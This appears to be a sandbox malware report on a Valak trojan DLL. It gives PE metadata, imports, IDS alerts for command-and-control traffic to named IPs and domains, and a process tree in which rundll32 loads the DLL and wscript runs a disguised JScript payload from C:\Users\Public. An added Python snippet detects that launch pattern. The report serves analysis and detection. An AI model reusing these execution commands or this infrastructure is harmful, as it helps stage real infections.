CLR (.Net) Version: (none listed)
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 3f31bb7bb53b534359adef9d369abdc6
                                                    Instruction
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    cmp dword ptr [ebp+0Ch], 01h
                                                    jne 00007F0D64926867h
                                                    call 00007F0D6492CEFFh
                                                    push dword ptr [ebp+08h]
                                                    mov ecx, dword ptr [ebp+10h]
                                                    mov edx, dword ptr [ebp+0Ch]
                                                    call 00007F0D64926751h
                                                    pop ecx
                                                    pop ebp
                                                    retn 000Ch
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    mov eax, dword ptr [ebp+08h]
                                                    xor ecx, ecx
                                                    cmp eax, dword ptr [10046310h+ecx*8]
                                                    je 00007F0D64926875h
                                                    inc ecx
                                                    cmp ecx, 2Dh
                                                    jc 00007F0D64926853h
                                                    lea ecx, dword ptr [eax-13h]
                                                    cmp ecx, 11h
                                                    jnbe 00007F0D64926870h
                                                    push 0000000Dh
                                                    pop eax
                                                    pop ebp
                                                    ret
                                                    mov eax, dword ptr [10046314h+ecx*8]
                                                    pop ebp
                                                    ret
                                                    add eax, FFFFFF44h
                                                    push 0000000Eh
                                                    pop ecx
                                                    cmp ecx, eax
                                                    sbb eax, eax
                                                    and eax, ecx
                                                    add eax, 08h
                                                    pop ebp
                                                    ret
                                                    call 00007F0D6492B75Fh
                                                    test eax, eax
                                                    jne 00007F0D64926868h
                                                    mov eax, 10046478h
                                                    ret
                                                    add eax, 08h
                                                    ret
                                                    call 00007F0D6492B74Ch
                                                    test eax, eax
                                                    jne 00007F0D64926868h
                                                    mov eax, 1004647Ch
                                                    ret
                                                    add eax, 0Ch
                                                    ret
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    call 00007F0D64926847h
                                                    mov ecx, dword ptr [ebp+08h]
                                                    push ecx
                                                    mov dword ptr [eax], ecx
                                                    call 00007F0D649267E7h
                                                    pop ecx
                                                    mov esi, eax
                                                    call 00007F0D64926821h
                                                    mov dword ptr [eax], esi
                                                    pop esi
                                                    pop ebp
                                                    ret
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 4Ch
                                                    mov eax, dword ptr [10046734h]
                                                    xor eax, ebp
                                                    mov dword ptr [ebp-04h], eax
                                                    push ebx
                                                    xor ebx, ebx
                                                    push esi
                                                    mov esi, dword ptr [ebp+08h]
                                                    Programming Language:
                                                    • [ASM] VS2008 build 21022
                                                    • [C++] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [EXP] VS2008 build 21022
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022
                                                     Name | Virtual Address | Virtual Size | Is in Section
                                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x453a0 | 0x48 | .rdata
                                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x44bcc | 0x3c | .rdata
                                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14d000 | 0x4ec | .rsrc
                                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14e000 | 0x17ac | .reloc
                                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x351c0 | 0x1c | .rdata
                                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x35000 | 0x158 | .rdata
                                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                                     Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                     .text | 0x1000 | 0x33225 | 0x33400 | False | 0.7268149771341463 | data | 6.796375367309152 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                     .rdata | 0x35000 | 0x103e8 | 0x10400 | False | 0.6549278846153846 | data | 5.757774709617991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                     .data | 0x46000 | 0x1068a8 | 0x5000 | False | 0.550927734375 | data | 4.716639874488365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                     .rsrc | 0x14d000 | 0x4ec | 0x600 | False | 0.38671875 | data | 4.551593190209784 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                     .reloc | 0x14e000 | 0x2ff0 | 0x3000 | False | 0.4087727864583333 | data | 4.183442579206289 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                     Name | RVA | Size | Type | Language | Country
                                                     RT_VERSION | 0x14d0a0 | 0x2f0 | SysEx File - ID | English | United States
                                                     RT_MANIFEST | 0x14d390 | 0x15a | ASCII text, with CRLF line terminators | English | United States
                                                     DLL | Import
                                                     KERNEL32.dll | CreateProcessW, VirtualProtectEx, CreateSemaphoreW, CloseHandle, CreateFileA, SetStdHandle, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentThreadId, GetCommandLineA, GetCPInfo, GetLastError, HeapFree, RtlUnwind, RaiseException, LCMapStringA, LCMapStringW, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleW, GetProcAddress, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapAlloc, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, GetStringTypeW, WriteFile, HeapSize, VirtualAlloc, HeapReAlloc, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetConsoleCP, GetConsoleMode, FlushFileBuffers, ReadFile, SetFilePointer, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetLocaleInfoW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA
                                                     urlmon.dll | GetComponentIDFromCLSSPEC, FindMediaTypeClass, FindMediaType, GetClassFileOrMime
                                                     Name | Ordinal | Address
                                                     Productword9 | 1 | 0x100301d0
                                                     Language of compilation system | Country where language is spoken | Map
                                                     English | United States | -
                                                     Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                     11/30/22-08:57:37.118787 | TCP | 2842995 | ETPRO TROJAN Win32/Valak v33 CnC Activity M1 | 49702 | 80 | 192.168.2.3 | 152.199.19.161
                                                     11/30/22-08:58:20.522210 | TCP | 2842995 | ETPRO TROJAN Win32/Valak v33 CnC Activity M1 | 49703 | 80 | 192.168.2.3 | 152.199.19.161
                                                     11/30/22-08:59:03.257622 | TCP | 2842995 | ETPRO TROJAN Win32/Valak v33 CnC Activity M1 | 49706 | 80 | 192.168.2.3 | 207.148.248.143
                                                     11/30/22-08:58:20.803397 | TCP | 2842995 | ETPRO TROJAN Win32/Valak v33 CnC Activity M1 | 49704 | 80 | 192.168.2.3 | 152.199.19.161
                                                     11/30/22-08:59:02.895059 | TCP | 2842995 | ETPRO TROJAN Win32/Valak v33 CnC Activity M1 | 49705 | 80 | 192.168.2.3 | 207.148.248.143
                                                     11/30/22-08:57:37.104764 | TCP | 2842995 | ETPRO TROJAN Win32/Valak v33 CnC Activity M1 | 49701 | 80 | 192.168.2.3 | 152.199.19.161
                                                    • Total Packets: 20
                                                    • 80 (HTTP)
                                                    • 53 (DNS)
                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                     Nov 30, 2022 08:59:02.792072058 CET | 49705 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:02.890474081 CET | 80 | 49705 | 207.148.248.143 | 192.168.2.3
                                                     Nov 30, 2022 08:59:02.890742064 CET | 49705 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:02.895059109 CET | 49705 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:02.994808912 CET | 80 | 49705 | 207.148.248.143 | 192.168.2.3
                                                     Nov 30, 2022 08:59:02.994968891 CET | 49705 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:03.151276112 CET | 49706 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:03.255824089 CET | 80 | 49706 | 207.148.248.143 | 192.168.2.3
                                                     Nov 30, 2022 08:59:03.256017923 CET | 49706 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:03.257622004 CET | 49706 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:03.363769054 CET | 80 | 49706 | 207.148.248.143 | 192.168.2.3
                                                     Nov 30, 2022 08:59:03.363899946 CET | 49706 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:12.995728970 CET | 80 | 49705 | 207.148.248.143 | 192.168.2.3
                                                     Nov 30, 2022 08:59:12.996102095 CET | 49705 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Nov 30, 2022 08:59:13.364358902 CET | 80 | 49706 | 207.148.248.143 | 192.168.2.3
                                                     Nov 30, 2022 08:59:13.364459038 CET | 49706 | 80 | 192.168.2.3 | 207.148.248.143
                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                     Nov 30, 2022 08:57:58.546968937 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:57:58.567497015 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3
                                                     Nov 30, 2022 08:57:59.673547983 CET | 52387 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:57:59.701442957 CET | 53 | 52387 | 8.8.8.8 | 192.168.2.3
                                                     Nov 30, 2022 08:58:20.418662071 CET | 56924 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:58:20.751039982 CET | 60625 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:58:41.613763094 CET | 49302 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:58:41.636904001 CET | 53 | 49302 | 8.8.8.8 | 192.168.2.3
                                                     Nov 30, 2022 08:58:41.888010979 CET | 53975 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:58:41.908310890 CET | 53 | 53975 | 8.8.8.8 | 192.168.2.3
                                                     Nov 30, 2022 08:59:02.656181097 CET | 51139 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:59:02.789993048 CET | 53 | 51139 | 8.8.8.8 | 192.168.2.3
                                                     Nov 30, 2022 08:59:03.031408072 CET | 52955 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:59:03.147399902 CET | 53 | 52955 | 8.8.8.8 | 192.168.2.3
                                                     Nov 30, 2022 08:59:10.006431103 CET | 60582 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:59:10.026748896 CET | 53 | 60582 | 8.8.8.8 | 192.168.2.3
                                                     Nov 30, 2022 08:59:10.126538038 CET | 57134 | 53 | 192.168.2.3 | 8.8.8.8
                                                     Nov 30, 2022 08:59:10.148607016 CET | 53 | 57134 | 8.8.8.8 | 192.168.2.3
                                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                     Nov 30, 2022 08:57:58.546968937 CET | 192.168.2.3 | 8.8.8.8 | 0xf2b1 | Standard query (0) | msnbot-207-46-194-33.search.msn.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:57:59.673547983 CET | 192.168.2.3 | 8.8.8.8 | 0x53a8 | Standard query (0) | msnbot-207-46-194-33.search.msn.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:20.418662071 CET | 192.168.2.3 | 8.8.8.8 | 0x599f | Standard query (0) | ec.atdmt.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:20.751039982 CET | 192.168.2.3 | 8.8.8.8 | 0x9a2e | Standard query (0) | ec.atdmt.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:41.613763094 CET | 192.168.2.3 | 8.8.8.8 | 0x7e8e | Standard query (0) | a-zcorner.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:41.888010979 CET | 192.168.2.3 | 8.8.8.8 | 0x5e81 | Standard query (0) | a-zcorner.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:02.656181097 CET | 192.168.2.3 | 8.8.8.8 | 0x4d29 | Standard query (0) | knockoutlights.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:03.031408072 CET | 192.168.2.3 | 8.8.8.8 | 0x1411 | Standard query (0) | knockoutlights.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:10.006431103 CET | 192.168.2.3 | 8.8.8.8 | 0x4025 | Standard query (0) | organicgreensfl.com | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:10.126538038 CET | 192.168.2.3 | 8.8.8.8 | 0x79f7 | Standard query (0) | organicgreensfl.com | A (IP address) | IN (0x0001) | false
                                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                     Nov 30, 2022 08:57:58.567497015 CET | 8.8.8.8 | 192.168.2.3 | 0xf2b1 | Name error (3) | msnbot-207-46-194-33.search.msn.com | none | none | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:57:59.701442957 CET | 8.8.8.8 | 192.168.2.3 | 0x53a8 | Name error (3) | msnbot-207-46-194-33.search.msn.com | none | none | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:20.444433928 CET | 8.8.8.8 | 192.168.2.3 | 0x599f | No error (0) | ec.atdmt.com | atlasdmt.vo.msecnd.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:20.774518967 CET | 8.8.8.8 | 192.168.2.3 | 0x9a2e | No error (0) | ec.atdmt.com | atlasdmt.vo.msecnd.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:41.636904001 CET | 8.8.8.8 | 192.168.2.3 | 0x7e8e | Name error (3) | a-zcorner.com | none | none | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:58:41.908310890 CET | 8.8.8.8 | 192.168.2.3 | 0x5e81 | Name error (3) | a-zcorner.com | none | none | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:02.789993048 CET | 8.8.8.8 | 192.168.2.3 | 0x4d29 | No error (0) | knockoutlights.com | - | 207.148.248.143 | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:03.147399902 CET | 8.8.8.8 | 192.168.2.3 | 0x1411 | No error (0) | knockoutlights.com | - | 207.148.248.143 | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:10.026748896 CET | 8.8.8.8 | 192.168.2.3 | 0x4025 | Name error (3) | organicgreensfl.com | none | none | A (IP address) | IN (0x0001) | false
                                                     Nov 30, 2022 08:59:10.148607016 CET | 8.8.8.8 | 192.168.2.3 | 0x79f7 | Name error (3) | organicgreensfl.com | none | none | A (IP address) | IN (0x0001) | false
                                                    • knockoutlights.com
                                                    Target ID:0
                                                    Start time:08:55:05
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\System32\loaddll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\draw.dll"
                                                    Imagebase:0x9e0000
                                                    File size:116736 bytes
                                                    MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:moderate

                                                    Target ID:1
                                                    Start time:08:55:05
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff745070000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:2
                                                    Start time:08:55:06
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                                                    Imagebase:0xb0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:3
                                                    Start time:08:55:06
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                                                    Imagebase:0x1300000
                                                    File size:61952 bytes
                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:high

                                                    Target ID:4
                                                    Start time:08:55:06
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                                                    Imagebase:0x1300000
                                                    File size:61952 bytes
                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:high

                                                    Target ID:12
                                                    Start time:08:57:23
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                                                    Imagebase:0x1120000
                                                    File size:147456 bytes
                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.663643714.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 0000000C.00000002.768788534.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:16
                                                    Start time:08:57:24
                                                    Start date:30/11/2022
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                                                    Imagebase:0x1120000
                                                    File size:147456 bytes
                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000002.768676273.0000000000708000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
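The command line recorded for this process (wscript.exe forced onto the JScript engine with //E:jscript for a file in C:\Users\Public whose extension is neither .js nor .jse) is the detail a detection engineer would key on: Windows Script Host normally chooses the engine from the file extension, so a payload hidden under a made-up extension has to be launched with an explicit //E: override. The checker below is an added example, not part of the Joe Sandbox report or of the analyzed sample. It runs over constructed process-creation events that reuse Sysmon Event ID 1 field names (Image, CommandLine); the events, including the benign ones, are made up for the example, and only the first reproduces the command line shown above.

```python
"""Added example (not from the sandbox report): flag Windows Script Host launches
that override the script engine for a file whose extension does not match, or
that run a script out of C:\\Users\\Public.  Events are constructed for the
example and use Sysmon Event ID 1 field names."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
JSCRIPT_EXTS = {".js", ".jse"}       # extensions JScript handles without //E:
VBSCRIPT_EXTS = {".vbs", ".vbe"}     # same for VBScript
ENGINE_FLAG = re.compile(r"^//E:(\w+)$", re.IGNORECASE)
PUBLIC_DIR = "c:\\users\\public\\"   # compared after ntpath.normcase()

# Windows-style tokenizer: a double-quoted run (closing quote optional, as in the
# truncated command line in the report) or a run of non-whitespace characters.
_TOKEN = re.compile(r'"([^"]*)"?|(\S+)')


def tokenize(cmdline):
    """Split a command line into arguments, stripping double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def engine_and_script(tokens):
    """Return (engine override in lower case or None, script path or None).

    The script is the first argument that is not a WSH host switch (//E:, //B,
    //Nologo, ...); everything after it belongs to the script, not the host."""
    engine, script = None, None
    for tok in tokens[1:]:
        m = ENGINE_FLAG.match(tok)
        if m:
            engine = m.group(1).lower()
        elif tok.startswith("//"):
            continue
        else:
            script = tok
            break
    return engine, script


def analyze(event):
    """Return a list of finding strings for one process-creation event."""
    if ntpath.basename(event["Image"]).lower() not in SCRIPT_HOSTS:
        return []
    engine, script = engine_and_script(tokenize(event["CommandLine"]))
    if script is None:
        return []
    findings = []
    ext = ntpath.splitext(script)[1].lower()
    expected = {"jscript": JSCRIPT_EXTS, "vbscript": VBSCRIPT_EXTS}.get(engine)
    if expected is not None and ext not in expected:
        findings.append(
            f"engine override //E:{engine} on non-{engine} extension {ext or '(none)'}")
    if ntpath.normcase(script).startswith(PUBLIC_DIR):
        findings.append("script executed from C:\\Users\\Public")
    return findings


def scan(events):
    """Return [(CommandLine, findings)] for every event that raised a finding."""
    hits = []
    for event in events:
        findings = analyze(event)
        if findings:
            hits.append((event["CommandLine"], findings))
    return hits


# Constructed sample events.  Only the first reuses the command line from the
# report (including its missing closing quote); the others are benign fillers.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan'},
    {"Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r'cscript.exe //Nologo "C:\Windows\System32\slmgr.vbs" /dlv'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //E:jscript //B C:\Scripts\inventory.js"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\Public\notes.txt"},
]

if __name__ == "__main__":
    for cmdline, findings in scan(EVENTS):
        print(cmdline)
        for finding in findings:
            print("  -", finding)
```

Only the first event fires, with both findings; the //E:jscript launch of a genuine .js file and the cscript.exe run of slmgr.vbs are left alone, which is the point of checking the engine override against the extension rather than alerting on every script host start.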

                                                    No disassembly